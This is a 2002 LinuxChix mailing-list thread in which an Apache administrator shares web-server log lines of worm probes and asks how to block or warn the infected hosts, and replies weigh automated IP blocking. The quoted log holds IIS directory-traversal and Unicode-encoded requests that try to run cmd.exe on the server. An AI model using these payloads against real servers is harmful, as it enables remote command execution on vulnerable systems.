[Techtalk] outlook virii

Davis, Jennifer JDavis at JUSTICE.GC.CA
Mon Apr 15 10:06:21 EST 2002


Since most of the infections seem to be on similar IPs as mine
64.2XX.XXX.XXX and my ADSL is PPPoE, I could see accidentally banning my own
IP.

-----Original Message-----
From: jennyw [mailto:jennyw at dangerousideas.com]
Sent: 2002 Apr 13 1:44 AM
To: Techtalk at linuxchix.org
Subject: Re: [Techtalk] outlook virii


I wonder if there's a Web site that lists the IPs of all infected 
machines. That might be interesting ...

Jen

On Fri, Apr 12, 2002 at 10:43:26PM -0400, James wrote:
> I remember someone that made a Perl script which added offending IPs to
> a ipchains/iptables block list.
> 
> However, automated is BAD.  If this procedure caught on, virii writers
> might spoof IPs as a snub to those who do this.  Imagine if suddenly
> you've blackholed localhost or your gateway or your DNS servers or
> everything else in your Class C.
> 
> Basically, I just laugh at Nimda/CR trying to compromise my Apache
> server and weep because of all the people who are still
> vulnerable/infected.
> 
> - James
> 
> > -----Original Message-----
> > From: techtalk-admin at linuxchix.org
> [mailto:techtalk-admin at linuxchix.org]
> > On Behalf Of Davis, Jennifer
> > Sent: Friday, April 12, 2002 5:20 PM
> > To: 'Techtalk at linuxchix.org'
> > Subject: [Techtalk] outlook virii
> > 
> > Hi:
> > 
> > 	I was wondering if it was possible to send some sort of message
> back
> > to people. (like maybe a popup message) when they hit my webserver
> that
> > surfing with viruses on their system is just not cool  See an except
> from
> > my
> > log below.  I estimate that 95% of the hits to my web server are these
> > exploit attempts.  Barring that is there a way to block an IP that
> we'll
> > say
> > is looking for root.exe?  The weserver is a standard Apache 1.3?  that
> > came
> > with Slackware 8.0.
> > 
> > Thanks again
> > Jenn
> > 
> > Jennifer Davis
> > Constitutional & Administrative Law - Droit administratif &
> > constitutionnel
> > Department of Justice Canada - Minist?re de la Justice du Canada
> > *(613) 957-4963 - fx (613) 941-1937
> > *jdavis at justice.gc.ca
> > 
> > 64.168.22.13 - - [10/Apr/2002:17:10:57 -0400] "GET
> > /scripts/root.exe?/c+dir
> > HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET
> /MSADC/root.exe?/c+dir
> > HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET
> > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:10:59 -0400] "GET
> > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET
> > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET
> > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET
> > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET
> >
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
> t/
> > sy
> > stem32/cmd.exe?/c+dir HTTP$
> > 64.168.22.13 - - [10/Apr/2002:17:11:02 -0400] "GET
> > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:03 -0400] "GET
> > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET
> > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET
> > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET
> > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
> > 64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET
> > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
> > 64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET
> > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
> 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET
> > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 
> > 
> > 
> > 
> > _______________________________________________
> > Techtalk mailing list
> > Techtalk at linuxchix.org
> > http://mailman.linuxchix.org/mailman/listinfo/techtalk
> 
> _______________________________________________
> Techtalk mailing list
> Techtalk at linuxchix.org
> http://mailman.linuxchix.org/mailman/listinfo/techtalk
> 
> 
_______________________________________________
Techtalk mailing list
Techtalk at linuxchix.org
http://mailman.linuxchix.org/mailman/listinfo/techtalk



More information about the Techtalk mailing list